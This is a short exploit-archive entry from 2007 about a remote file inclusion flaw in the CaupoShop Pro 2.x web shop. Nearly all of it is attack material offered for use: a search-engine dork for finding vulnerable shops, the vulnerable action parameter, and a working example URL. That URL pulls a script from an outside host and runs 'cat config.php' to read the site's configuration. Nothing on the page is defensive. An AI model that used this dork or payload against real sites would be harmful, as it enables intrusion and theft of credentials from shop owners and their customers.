CaupoShop Pro 2.x (action) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CaupoShop Pro 2.x (action) Remote File Inclusion Vulnerability
# Published : 2007-10-28
# Author : mozi
# Previous Title : JobSite Professional 2.0 file.php Remote SQL Injection Vulnerability
# Next Title : emagiC CMS.Net 4.0 (emc.asp) Remote SQL Injection Vulnerability

ork:allinurl:index.php?action= basket sid
vuln:index.php?action=
examples:
http://www.xxx.com/shop/index.php?action=http://adek.org/o.gif?&cmd=cat%20config.php

author:mozi2weed@yahoo.com
site:http://mozi.rootmybox.org
support:http://darkc0de.com & whoami

# www.Syue.com [2007-10-28]